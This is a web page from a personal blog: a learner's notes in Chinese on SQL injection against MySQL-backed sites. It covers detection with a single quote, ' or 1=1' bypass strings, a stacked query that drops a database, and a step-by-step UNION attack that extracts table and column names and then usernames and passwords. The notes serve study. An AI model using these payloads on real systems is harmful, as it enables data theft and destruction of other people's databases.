<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="Hexo Theme Redefine">
    <meta name="author" content="Orange Wang">
    <link rel="canonical" href="http://example.com/2023/01/02/SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/" />
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    <link rel="icon" type="image/png" href="/images/redefine-logo.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-logo.svg">
    <link rel="shortcut icon" href="/images/redefine-logo.svg">
    
    <title>
        
            SQL注入笔记 |
        
        Orange Wang&#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/css/fonts.css">

    
    <link rel="preconnect" href="https://evan.beee.top" crossorigin>
    <script id="hexo-configurations">
    let REDEFINE = window.REDEFINE || {};
    REDEFINE.hexo_config = {"hostname":"example.com","root":"/","language":"en"};
    REDEFINE.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#005080","avatar":"/images/redefine-avatar.svg","favicon":"/images/redefine-logo.svg","article_img_align":"center","right_side_width":"210px","content_max_width":"1000px","nav_color":{"left":"#f78736","right":"#367df7","transparency":35},"hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"background_image":{"light":"https://evan.beee.top/img/wallhaven-wqery6-light.webp","dark":"https://evan.beee.top/img/wallhaven-wqery6-dark.webp"},"title_color":{"light":"#fff","dark":"#d1d1b6"},"description":"Theme Redefine"},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":false}}},"local_search":{"enable":false,"preload":true},"code_block":{"copy":true,"style":"mac"},"pjax":{"enable":true},"lazyload":{"enable":true},"version":"0.5.2","friend_links":{"columns":2}};
    REDEFINE.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
    
    
<link rel="stylesheet" href="/css/fontawesome.min.css">

    
<link rel="stylesheet" href="/css/brands.min.css">

    
<link rel="stylesheet" href="/css/solid.min.css">

    
<link rel="stylesheet" href="/css/regular.min.css">

    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">
    
    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Orange Wang&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="pc">
                <ul class="menu-list">
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                            <i class="fa-regular fa-archive"></i>
                                        
                                        ARCHIVES
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/archives"  >
                             
                                
                                    <i class="fa-regular fa-archive"></i>
                                
                                ARCHIVES
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">
            <div class="article-title">
                <span class="title-hover-animation"><h1 style="font-size:2rem; font-weight: bold; margin: 10px 0;">SQL注入笔记</h1></span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/redefine-avatar.svg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">Orange Wang</span>
                            
                                <span class="author-label">lol</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="pc">2023-01-02 22:32:53</span>
        <span class="mobile">2023-01-02 22:32</span>
    </span>
    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>下面是SQL注入学习过程中的笔记：</p>
<h2 id="mysql简介"><a href="#mysql简介" class="headerlink" title="mysql简介"></a>mysql简介</h2><p>mysql包含四个库，分别是information_schema，mysql，performance_schema，sys（使用SHOW DATABASES访问）<br>information_schema存储着所有的其他数据库的信息，包含数据库名，数据库表名，数据类型，访问权限等等<br>其中COLUMNS存储字段信息，TABLES存储表名，SCHEMATA存储着所有数据库信息（show databases结果就存储在这个表中）<br>在TABLES表中，TABLE_NAME存储表名，TABLE_SCHEMA存储这个表所在的数据库<br>在COLUMNS表中，COLUMN_NAME存储着表的字段名，TABLE_NAME也是存储表名</p>
<h2 id="一些SQL语法"><a href="#一些SQL语法" class="headerlink" title="一些SQL语法"></a>一些SQL语法</h2><ol>
<li>注释<ol>
<li><code>-- （一个空格）</code>后面的内容叫注释!</li>
<li><code>#</code>后面的内容叫注释！（可以没有空格）</li>
</ol>
</li>
<li>列出所有数据库<br><code>show databases;</code></li>
<li>查看某一个数据库里所有的表<br> 先<code>use 数据库名;</code>告诉他们要查哪个数据库里的表，再<code>show tables;</code>;<br> 或<code>show tables from 数据库名</code></li>
<li>select函数基本用法<ol>
<li><code>select now();</code>显示当前时间</li>
<li><code>select database();</code>查看我们当前选择的是哪个库</li>
<li><code>select version();</code>查看当前版本</li>
<li><code>select user();</code>查看当前登录数据库的用户</li>
<li><code>select @@datadir;</code>查看数据路径</li>
<li><code>select @@basedir;</code>查看mysql安装路径</li>
<li><code>select @@version_compile_os;</code>查看mysql安装的系统<br><strong>重点来啦！</strong></li>
</ol>
</li>
<li>select关键字查询数据重点用法<br><code>select * from 数据库名.表名；</code> 查询数据（<code>*</code>表示所有字段）<br>  查具体字段就把<code>*</code>换成具体字段名，如select id,host from mysql.user;查询id和host字段)</li>
<li>union联合查询<br>例：<br><code>select * from test.t1 union select 1,2,3,4,5;</code><br><code>select user,host from mysql.user union select * from test.t1;</code></li>
<li>where条件<br>where相当于编程语言中的if<br>例：select user,host from mysql.user where user&#x3D;’root’;</li>
<li>创建库<br><code>create database test charset utf8mb4;</code>创建一个名为test的数据库</li>
<li>创建表<br>先<code>use test；</code><br>再<code>create table t1(id int);</code><br>效果为：在test数据库里创建一个名为t1的表，含有一个名为id的字段，数据类型为int</li>
<li>删除表<br><code>drop table t1</code>   删除表t1</li>
<li>给表添加字段<br><code>alter table 表名 add 字段名 数据类型</code><br>例：alter table t1 add name varchar(32);</li>
<li>插入数据<br><code>insert into t1 values (1,&quot;张三&quot;),(2,&quot;李四&quot;),(3,&quot;王五&quot;)</code></li>
</ol>
<h2 id="判断是否存在SQL注入漏洞"><a href="#判断是否存在SQL注入漏洞" class="headerlink" title="判断是否存在SQL注入漏洞"></a>判断是否存在SQL注入漏洞</h2><p>对于一个陌生网站，判断其是否存在SQL注入漏洞：<br>输入框内输入一个英文单引号’并上传，然后F12，进入Network网络部分查看Response<br>若提示SQL语法存在错误，则该网站大概率存在SQL注入漏洞。</p>
<h2 id="GET型SQL注入漏洞"><a href="#GET型SQL注入漏洞" class="headerlink" title="GET型SQL注入漏洞"></a>GET型SQL注入漏洞</h2><p>我们在提交网页内容的时候，主要分为GET方法，POST方法，GET方法提交的内容会显示在网页的URL上，<br>通过对URL连接进行构造，可以获得超出权限的信息内容。</p>
<p>注入内容：<br><code>&#39; or 1=1#</code><br>或<code>&#39; or 1=1 -- </code><br>(此处英文单引号的作用是使条件闭合，在语法上形成完整的SQL语句，而<code>#</code>或<code>-- </code>的作用是注释掉后面的多余内容)</p>
<ul>
<li>检索隐藏数据</li>
<li>修改应用程序（语句）逻辑</li>
<li>Union attack</li>
<li>获取敏感数据</li>
<li>盲注</li>
</ul>
<h4 id="应用"><a href="#应用" class="headerlink" title="应用"></a>应用</h4><p>提交，查看URL</p>
<ol>
<li>通过注入语句修改查询条件<code>以获取隐藏信息</code>：<br>应注入<code>xxx&#39; -- </code>或<code>xxx&#39;#</code>来实现这一点</li>
<li>查询出所有数据信息：<br>注入<code>xxx&#39; or 1=1#</code>或<code>xxx&#39; or 1=1 -- </code>来干掉sql语句中的where条件</li>
<li>删库<br>注入<code>xxx&#39;;drop database 数据库名;#</code><br>或<code>xxx&#39;;drop database 数据库名; -- </code><br>（前提：服务端连接数据库时允许执行多条sql语句）</li>
<li>拿到所有用户名和密码并登陆系统<br>用到：<strong>联合注入（union attack)</strong>!<ol>
<li>拿到数据库database<br>database()返回当前连接的数据库是哪个</li>
<li>拿到表table</li>
<li>拿到表里的字段</li>
<li>分析是否包含形如username，password等的字段<br>注：联合注入需要知道union前面的表包含几个字段，union后面字段数应与前面一致<br><strong>爆字段数的步骤：</strong><br>执行<code>select * from products union select 1;</code><br>若报错则说明前后字段数不一致<br>改为<code>select * from products union select 1，2;</code><br>再报错再改成<code>select 1,2,3;</code><br>直到有回显为止！<br>知道了表的字段数！<br>接下来把union后面的1，2，3等改为一些需要的函数，如user(),database()等<br>例：<code>select * from products union select 1,user(),3,version(),database();</code><br><strong>注意：</strong><br><strong>1.改的时候注意对应字段的数据类型！要与函数的返回类型对应！</strong><br><strong>2.根据语句语法在最后加#注释多余内容防止报错！</strong><br>(格式如：输入框里输gifts’ union select 1,2,3,4#)</li>
</ol>
</li>
</ol>
<p>在输入框里输入<code>gifts&#39; union select 1,database(),3,4#</code>即可拿到数据库名。<br>拿到数据库名后，接下来拿表名：<br>在输入框里输入<code>1&#39; union select 1,database(),table_name,4 from information_schema.tables where table_schema=database()#</code>得到表名。<br>接下来分析表字段(假设有一张表，名为user)：<br>输入<code>1&#39; union select 1,database(),column_name,4 from information_schema.columns where table_name=&#39;user&#39; and table_schema=database()#</code><br>指出当前数据库中的名为user的表中的字段名<br>假设有字段名为username和password<br>则输入<code>1&#39;union select 1,username,password,4 from user #</code><br>可以拿到用户名和密码！！！</p>
<h2 id="POST型SQL注入漏洞"><a href="#POST型SQL注入漏洞" class="headerlink" title="POST型SQL注入漏洞"></a>POST型SQL注入漏洞</h2><p>提交的内容在url上没有显示，是post型与get型的区别之一<br>方法：提交，F12看“网络”Network部分，再点提交，找php文件！<br>首先看到<code>请求URL</code>,即是post注入的地址，<br>再找到最下面form data,里面有post注入的参数（字段）</p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li>Post title：SQL注入笔记</li>
        <li>Post author：Orange Wang</li>
        <li>Create time：2023-01-02 22:32:53</li>
        <li>
            Post link：https://redefine.ohevan.com/2023/01/02/SQL注入笔记/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

                </div>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/01/03/%E6%90%9C%E9%9B%86%E4%BA%86sqlmap%E7%9A%84%E4%B8%80%E4%BA%9B%E6%8C%87%E4%BB%A4/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">搜集了sqlmap的一些指令</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/01/02/%E4%B8%80%E4%BA%9Blinux%E5%91%BD%E4%BB%A4/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">一些linux命令</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            

            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div style="font-size: 1.3rem;margin-top: 0; margin-bottom: 0.8rem; transition-duration: 0.1s;"><i class="fa-solid fa-list"></i> <strong>Contents</strong></div>
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql%E7%AE%80%E4%BB%8B"><span class="nav-text">mysql简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%80%E4%BA%9BSQL%E8%AF%AD%E6%B3%95"><span class="nav-text">一些SQL语法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A4%E6%96%AD%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="nav-text">判断是否存在SQL注入漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#GET%E5%9E%8BSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="nav-text">GET型SQL注入漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BA%94%E7%94%A8"><span class="nav-text">应用</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#POST%E5%9E%8BSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="nav-text">POST型SQL注入漏洞</span></a></li></ol>
    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>



        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;<i class="fa-solid fa-heart icon-animate"></i>&nbsp;<a href="/">Orange Wang. All Rights Reserved.</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        Visitor Count&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        Totalviews&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;|&nbsp;Theme&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v0.5.2</a>
        </div>
        
        
        <script async data-pjax defer>
            function odometer_init(){
                    let el = document.getElementsByClassName('odometer');
                    for (i = 0; i < el.length; i++) {
                        od = new Odometer({
                            el: el[i],
                            format: '( ddd).dd',
                            duration: 200
                        });
                    }
            }
            odometer_init();
        </script>
        <div id="start_time_div" style="display:none">
            2022/8/17 11:45:14
        </div>
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        

        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fa-solid fa-magnifying-glass-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fa-solid fa-magnifying-glass-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fa-solid fa-left-right"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fa-solid fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fa-solid fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fa-solid fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fa-solid fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>





    
<script src="/js/code-copy.js"></script>




    
<script src="/js/lazyload.js"></script>




    
<script src="/js/runtime.js"></script>

    
<script src="/js/odometer.min.js"></script>

    
<link rel="stylesheet" href="/css/odometer-theme-minimal.css">



<div class="post-scripts pjax">
    
        
<script src="/js/toc-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            REDEFINE.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            REDEFINE.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            REDEFINE.refresh();
        });
    });
</script>



</body>
</html>
